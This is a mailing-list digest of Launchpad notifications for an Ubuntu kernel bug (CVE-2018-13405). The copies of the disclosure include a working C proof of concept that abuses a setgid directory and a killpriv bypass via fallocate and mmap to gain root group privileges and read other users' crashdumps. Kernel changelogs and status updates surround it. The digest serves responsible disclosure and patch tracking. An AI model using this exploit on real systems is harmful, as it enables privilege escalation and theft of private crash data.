[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
** Changed in: linux (Ubuntu Cosmic)
Status: In Progress => Won't Fix
** Changed in: linux (Ubuntu)
Status: In Progress => Fix Released
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1779923
Title:
other users' coredumps can be read via setgid directory and killpriv
bypass
Status in linux package in Ubuntu:
Fix Released
Status in linux source package in Trusty:
Fix Released
Status in linux source package in Xenial:
Fix Released
Status in linux source package in Bionic:
Fix Released
Status in linux source package in Cosmic:
Won't Fix
Bug description:
Note: I am both sending this bug report to secur...@kernel.org and filing it
in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as a Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
, describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat > demo.c
#include
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:~/sgid_demo$ gcc -o demo demo.c
user@debian:~/sgid_demo$ ./demo
user@debian:~/sgid_demo$ ls -l dir/file
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_remove_suid()"
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid
directory"
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at
https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/
):
=
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat fallocate.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, _stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd,
0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl("./dir/file", "id", NULL);
err(1, "execl");
}
user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
user@debian:~/sgid_demo$ ./fallocate
uid=1000(user) gid=1000(user) egid=0(root)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
=
sys_copy_file_range() also looks as if it bypasses killpriv on
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 296
-rw-r- 1 user whoopsie 16527 Jun 25 22:27
_usr_bin_apport-unpack.1000.crash
-rw-r- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
cat: /var/crash/_usr_bin_id.0.crash: Permission denied
user@ubuntu-18-04-vm:~$ cat fallocate.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
int main(int argc, char **argv) {
if (argc != 2) {
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 3.13.0-157.207
---
linux (3.13.0-157.207) trusty; urgency=medium
* linux: 3.13.0-157.207 -proposed tracker (LP: #1787982)
* CVE-2017-5715 (Spectre v2 retpoline)
- SAUCE: Fix "x86/retpoline/entry: Convert entry assembler indirect jumps"
* CVE-2017-2583
- KVM: x86: fix emulation of "MOV SS, null selector"
* CVE-2017-7518
- KVM: x86: fix singlestepping over syscall
* CVE-2017-18270
- KEYS: prevent creating a different user's keyrings
* Update to upstream's implementation of Spectre v1 mitigation (LP: #1774181)
- Documentation: Document array_index_nospec
- array_index_nospec: Sanitize speculative array de-references
- x86: Implement array_index_mask_nospec
- x86: Introduce barrier_nospec
- x86/get_user: Use pointer masking to limit speculation
- x86/syscall: Sanitize syscall table de-references under speculation
- vfs, fdtable: Prevent bounds-check bypass via speculative execution
- nl80211: Sanitize array index in parse_txq_params
- x86/spectre: Report get_user mitigation for spectre_v1
- x86/kvm: Update spectre-v1 mitigation
- nospec: Allow index argument to have const-qualified type
- nospec: Move array_index_nospec() parameter checking into separate macro
- nospec: Kill array_index_nospec_mask_check()
- SAUCE: Replace osb() calls with array_index_nospec()
- SAUCE: Rename osb() to barrier_nospec()
- SAUCE: x86: Use barrier_nospec in arch/x86/um/asm/barrier.h
* Prevent speculation on user controlled pointer (LP: #1775137)
- x86: reorganize SMAP handling in user space accesses
- x86: fix SMAP in 32-bit environments
- x86: Introduce __uaccess_begin_nospec() and uaccess_try_nospec
- x86/usercopy: Replace open coded stac/clac with __uaccess_{begin, end}
- x86/uaccess: Use __uaccess_begin_nospec() and uaccess_try_nospec
* CVE-2016-10208
- ext4: validate s_first_meta_bg at mount time
- ext4: fix fencepost in s_first_meta_bg validation
* CVE-2018-10323
- xfs: set format back to extents if xfs_bmap_extents_to_btree
* CVE-2017-16911
- usbip: prevent vhci_hcd driver from leaking a socket pointer address
* CVE-2018-13406
- video: uvesafb: Fix integer overflow in allocation
* CVE-2018-10877
- ext4: verify the depth of extent tree in ext4_find_extent()
* CVE-2018-10881
- ext4: clear i_data in ext4_inode_info when removing inline data
* CVE-2018-1092
- ext4: fail ext4_iget for root directory if unallocated
* CVE-2018-1093
- ext4: fix block bitmap validation when bigalloc, ^flex_bg
- ext4: add validity checks for bitmap block numbers
* CVE-2018-12233
- jfs: Fix inconsistency between memory allocation and ea_buf->max_size
* CVE-2017-16912
- usbip: fix stub_rx: get_pipe() to validate endpoint number
* CVE-2018-10675
- mm/mempolicy: fix use after free when calling get_mempolicy
* CVE-2017-8831
- saa7164: fix sparse warnings
- saa7164: fix double fetch PCIe access condition
* CVE-2017-16533
- HID: usbhid: fix out-of-bounds bug
* CVE-2017-16538
- media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner
- media: dvb-usb-v2: lmedm04: Improve logic checking of warm start
* CVE-2017-16644
- hdpvr: Remove deprecated create_singlethread_workqueue
- media: hdpvr: Fix an error handling path in hdpvr_probe()
* CVE-2017-16645
- Input: ims-psu - check if CDC union descriptor is sane
* CVE-2017-5549
- USB: serial: kl5kusb105: fix line-state error handling
* CVE-2017-16532
- usb: usbtest: fix NULL pointer dereference
* CVE-2017-16537
- media: imon: Fix null-ptr-deref in imon_probe
* CVE-2017-11472
- ACPICA: Add additional debug info/statements
- ACPICA: Namespace: fix operand cache leak
* CVE-2017-16643
- Input: gtco - fix potential out-of-bound access
* CVE-2017-16531
- USB: fix out-of-bounds in usb_set_configuration
* CVE-2018-10124
- kernel/signal.c: avoid undefined behaviour in kill_something_info
* CVE-2017-6348
- irda: Fix lockdep annotations in hashbin_delete().
* CVE-2017-17558
- USB: core: prevent malicious bNumInterfaces overflow
* CVE-2017-5897
- ip6_gre: fix ip6gre_err() invalid reads
* CVE-2017-6345
- SAUCE: import sock_efree()
- net/llc: avoid BUG_ON() in skb_orphan()
* CVE-2017-7645
- nfsd: check for oversized NFSv2/v3 arguments
* CVE-2017-9984
- ALSA: msnd: Optimize / harden DSP and MIDI loops
* CVE-2018-1000204
- scsi: sg: allocate with __GFP_ZERO in sg_build_indirect()
* CVE-2018-10021
- scsi: libsas: defer ata device eh commands to libata
* CVE-2017-16914
- usbip: fix stub_send_ret_submit() vulnerability to null transfer_buffer
* CVE-2017-16913
- usbip: fix stub_rx: harden CMD_SUBMIT path to handle malicious input
* CVE-2017-16535
- USB: core: fix out-of-bounds access bug in
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 4.4.0-134.160 --- linux (4.4.0-134.160) xenial; urgency=medium * linux: 4.4.0-134.160 -proposed tracker (LP: #1787177) * locking sockets broken due to missing AppArmor socket mediation patches (LP: #1780227) - UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets * Backport namespaced fscaps to xenial 4.4 (LP: #1778286) - Introduce v3 namespaced file capabilities - commoncap: move assignment of fs_ns to avoid null pointer dereference - capabilities: fix buffer overread on very short xattr - commoncap: Handle memory allocation failure. * Xenial update to 4.4.140 stable release (LP: #1784409) - usb: cdc_acm: Add quirk for Uniden UBC125 scanner - USB: serial: cp210x: add CESINEL device ids - USB: serial: cp210x: add Silicon Labs IDs for Windows Update - n_tty: Fix stall at n_tty_receive_char_special(). - staging: android: ion: Return an ERR_PTR in ion_map_kernel - n_tty: Access echo_* variables carefully. - x86/boot: Fix early command-line parsing when matching at end - ath10k: fix rfc1042 header retrieval in QCA4019 with eth decap mode - i2c: rcar: fix resume by always initializing registers before transfer - ipv4: Fix error return value in fib_convert_metrics() - kprobes/x86: Do not modify singlestep buffer while resuming - nvme-pci: initialize queue memory before interrupts - netfilter: nf_tables: use WARN_ON_ONCE instead of BUG_ON in nft_do_chain() - ARM: dts: imx6q: Use correct SDMA script for SPI5 core - ubi: fastmap: Correctly handle interrupted erasures in EBA - mm: hugetlb: yield when prepping struct pages - tracing: Fix missing return symbol in function_graph output - scsi: sg: mitigate read/write abuse - s390: Correct register corruption in critical section cleanup - drbd: fix access after free - cifs: Fix infinite loop when using hard mount option - jbd2: don't mark block as modified if the handle is out of credits - ext4: make sure bitmaps and the inode table don't overlap with bg descriptors - ext4: always check block group bounds in ext4_init_block_bitmap() - ext4: only look at the bg_flags field if it is valid - ext4: verify the depth of extent tree in ext4_find_extent() - ext4: include the illegal physical block in the bad map ext4_error msg - ext4: clear i_data in ext4_inode_info when removing inline data - ext4: add more inode number paranoia checks - ext4: add more mount time checks of the superblock - ext4: check superblock mapped prior to committing - HID: i2c-hid: Fix "incomplete report" noise - HID: hiddev: fix potential Spectre v1 - HID: debug: check length before copy_to_user() - x86/mce: Detect local MCEs properly - x86/mce: Fix incorrect "Machine check from unknown source" message - media: cx25840: Use subdev host data for PLL override - mm, page_alloc: do not break __GFP_THISNODE by zonelist reset - dm bufio: avoid sleeping while holding the dm_bufio lock - dm bufio: drop the lock when doing GFP_NOIO allocation - mtd: rawnand: mxc: set spare area size register explicitly - dm bufio: don't take the lock in dm_bufio_shrink_count - mtd: cfi_cmdset_0002: Change definition naming to retry write operation - mtd: cfi_cmdset_0002: Change erase functions to retry for error - mtd: cfi_cmdset_0002: Change erase functions to check chip good only - netfilter: nf_log: don't hold nf_log_mutex during user access - staging: comedi: quatech_daqp_cs: fix no-op loop daqp_ao_insn_write() - Linux 4.4.140 * Xenial update to 4.4.139 stable release (LP: #1784382) - xfrm6: avoid potential infinite loop in _decode_session6() - netfilter: ebtables: handle string from userspace with care - ipvs: fix buffer overflow with sync daemon and service - atm: zatm: fix memcmp casting - net: qmi_wwan: Add Netgear Aircard 779S - net/sonic: Use dma_mapping_error() - Revert "Btrfs: fix scrub to repair raid6 corruption" - tcp: do not overshoot window_clamp in tcp_rcv_space_adjust() - Btrfs: make raid6 rebuild retry more - usb: musb: fix remote wakeup racing with suspend - bonding: re-evaluate force_primary when the primary slave name changes - tcp: verify the checksum of the first data segment in a new connection - ext4: update mtime in ext4_punch_hole even if no blocks are released - ext4: fix fencepost error in check for inode count overflow during resize - driver core: Don't ignore class_dir_create_and_add() failure. - btrfs: scrub: Don't use inode pages for device replace - ALSA: hda - Handle kzalloc() failure in snd_hda_attach_pcm_stream() - ALSA: hda: add dock and led support for HP EliteBook 830 G5 - ALSA: hda: add dock and led support for HP ProBook 640 G4 - cpufreq: Fix new policy initialization during limits updates via
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 4.15.0-33.36 --- linux (4.15.0-33.36) bionic; urgency=medium * linux: 4.15.0-33.36 -proposed tracker (LP: #1787149) * RTNL assertion failure on ipvlan (LP: #1776927) - ipvlan: drop ipv6 dependency - ipvlan: use per device spinlock to protect addrs list updates - SAUCE: fix warning from "ipvlan: drop ipv6 dependency" * ubuntu_bpf_jit test failed on Bionic s390x systems (LP: #1753941) - test_bpf: flag tests that cannot be jited on s390 * HDMI/DP audio can't work on the laptop of Dell Latitude 5495 (LP: #1782689) - drm/nouveau: fix nouveau_dsm_get_client_id()'s return type - drm/radeon: fix radeon_atpx_get_client_id()'s return type - drm/amdgpu: fix amdgpu_atpx_get_client_id()'s return type - platform/x86: apple-gmux: fix gmux_get_client_id()'s return type - ALSA: hda: use PCI_BASE_CLASS_DISPLAY to replace PCI_CLASS_DISPLAY_VGA - vga_switcheroo: set audio client id according to bound GPU id * locking sockets broken due to missing AppArmor socket mediation patches (LP: #1780227) - UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets * Update2 for ocxl driver (LP: #1781436) - ocxl: Fix page fault handler in case of fault on dying process * netns: unable to follow an interface that moves to another netns (LP: #1774225) - net: core: Expose number of link up/down transitions - dev: always advertise the new nsid when the netns iface changes - dev: advertise the new ifindex when the netns iface changes * [Bionic] Disk IO hangs when using BFQ as io scheduler (LP: #1780066) - block, bfq: fix occurrences of request finish method's old name - block, bfq: remove batches of confusing ifdefs - block, bfq: add requeue-request hook * HP ProBook 455 G5 needs mute-led-gpio fixup (LP: #1781763) - ALSA: hda: add mute led support for HP ProBook 455 G5 * [Bionic] bug fixes to improve stability of the ThunderX2 i2c driver (LP: #1781476) - i2c: xlp9xx: Fix issue seen when updating receive length - i2c: xlp9xx: Make sure the transfer size is not more than I2C_SMBUS_BLOCK_SIZE * x86/kvm: fix LAPIC timer drift when guest uses periodic mode (LP: #1778486) - x86/kvm: fix LAPIC timer drift when guest uses periodic mode * Please include ax88179_178a and r8152 modules in d-i udeb (LP: #1771823) - [Config:] d-i: Add ax88179_178a and r8152 to nic-modules * Nvidia fails after switching its mode (LP: #1778658) - PCI: Restore config space on runtime resume despite being unbound * Kernel error "task zfs:pid blocked for more than 120 seconds" (LP: #1781364) - SAUCE: (noup) zfs to 0.7.5-1ubuntu16.3 * CVE-2018-12232 - PATCH 1/1] socket: close race condition between sock_close() and sockfs_setattr() * CVE-2018-10323 - xfs: set format back to extents if xfs_bmap_extents_to_btree * change front mic location for more lenovo m7/8/9xx machines (LP: #1781316) - ALSA: hda/realtek - Fix the problem of two front mics on more machines - ALSA: hda/realtek - two more lenovo models need fixup of MIC_LOCATION * Cephfs + fscache: unable to handle kernel NULL pointer dereference at IP: jbd2__journal_start+0x22/0x1f0 (LP: #1783246) - ceph: track read contexts in ceph_file_info * Touchpad of ThinkPad P52 failed to work with message "lost sync at byte" (LP: #1779802) - Input: elantech - fix V4 report decoding for module with middle key - Input: elantech - enable middle button of touchpads on ThinkPad P52 * xhci_hcd :00:14.0: Root hub is not suspended (LP: #1779823) - usb: xhci: dbc: Fix lockdep warning - usb: xhci: dbc: Don't decrement runtime PM counter if DBC is not started * CVE-2018-13406 - video: uvesafb: Fix integer overflow in allocation * CVE-2018-10840 - ext4: correctly handle a zero-length xattr with a non-zero e_value_offs * CVE-2018-11412 - ext4: do not allow external inodes for inline data * CVE-2018-10881 - ext4: clear i_data in ext4_inode_info when removing inline data * CVE-2018-12233 - jfs: Fix inconsistency between memory allocation and ea_buf->max_size * CVE-2018-12904 - kvm: nVMX: Enforce cpl=0 for VMX instructions * Error parsing PCC subspaces from PCCT (LP: #1528684) - mailbox: PCC: erroneous error message when parsing ACPI PCCT * CVE-2018-13094 - xfs: don't call xfs_da_shrink_inode with NULL bp * other users' coredumps can be read via setgid directory and killpriv bypass (LP: #1779923) // CVE-2018-13405 - Fix up non-directory creation in SGID directories * Invoking obsolete 'firmware_install' target breaks snap build (LP: #1782166) - snapcraft.yaml: stop invoking the obsolete (and non-existing) 'firmware_install' target * snapcraft.yaml: missing ubuntu-retpoline-extract-one script breaks the build (LP: #1782116) - snapcraft.yaml: copy
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
** No longer affects: whoopsie (Ubuntu)
** No longer affects: whoopsie (Ubuntu Trusty)
** No longer affects: whoopsie (Ubuntu Xenial)
** No longer affects: whoopsie (Ubuntu Bionic)
** No longer affects: whoopsie (Ubuntu Cosmic)
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1779923
Title:
other users' coredumps can be read via setgid directory and killpriv
bypass
Status in linux package in Ubuntu:
In Progress
Status in linux source package in Trusty:
In Progress
Status in linux source package in Xenial:
In Progress
Status in linux source package in Bionic:
In Progress
Status in linux source package in Cosmic:
In Progress
Bug description:
Note: I am both sending this bug report to secur...@kernel.org and filing it
in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as a Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
, describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat > demo.c
#include
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:~/sgid_demo$ gcc -o demo demo.c
user@debian:~/sgid_demo$ ./demo
user@debian:~/sgid_demo$ ls -l dir/file
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_remove_suid()"
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid
directory"
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at
https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/
):
=
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat fallocate.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, _stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd,
0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl("./dir/file", "id", NULL);
err(1, "execl");
}
user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
user@debian:~/sgid_demo$ ./fallocate
uid=1000(user) gid=1000(user) egid=0(root)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
=
sys_copy_file_range() also looks as if it bypasses killpriv on
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 296
-rw-r- 1 user whoopsie 16527 Jun 25 22:27
_usr_bin_apport-unpack.1000.crash
-rw-r- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
cat: /var/crash/_usr_bin_id.0.crash: Permission denied
user@ubuntu-18-04-vm:~$ cat fallocate.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
I don't think the Security or Foundations teams plan to make any changes
in Whoopsie so I'm marking these tasks as invalid.
** Changed in: whoopsie (Ubuntu Trusty)
Status: New => Invalid
** Changed in: whoopsie (Ubuntu Xenial)
Status: New => Invalid
** Changed in: whoopsie (Ubuntu Bionic)
Status: New => Invalid
** Changed in: whoopsie (Ubuntu Cosmic)
Status: New => Invalid
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1779923
Title:
other users' coredumps can be read via setgid directory and killpriv
bypass
Status in linux package in Ubuntu:
In Progress
Status in whoopsie package in Ubuntu:
Invalid
Status in linux source package in Trusty:
In Progress
Status in whoopsie source package in Trusty:
Invalid
Status in linux source package in Xenial:
In Progress
Status in whoopsie source package in Xenial:
Invalid
Status in linux source package in Bionic:
In Progress
Status in whoopsie source package in Bionic:
Invalid
Status in linux source package in Cosmic:
In Progress
Status in whoopsie source package in Cosmic:
Invalid
Bug description:
Note: I am both sending this bug report to secur...@kernel.org and filing it
in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as a Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
, describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat > demo.c
#include
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:~/sgid_demo$ gcc -o demo demo.c
user@debian:~/sgid_demo$ ./demo
user@debian:~/sgid_demo$ ls -l dir/file
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_remove_suid()"
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid
directory"
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at
https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/
):
=
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat fallocate.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, _stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd,
0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl("./dir/file", "id", NULL);
err(1, "execl");
}
user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
user@debian:~/sgid_demo$ ./fallocate
uid=1000(user) gid=1000(user) egid=0(root)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
=
sys_copy_file_range() also looks as if it bypasses killpriv on
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 296
-rw-r- 1 user whoopsie 16527 Jun 25 22:27
_usr_bin_apport-unpack.1000.crash
-rw-r- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r- 1 user whoopsie 51842 Jun 25
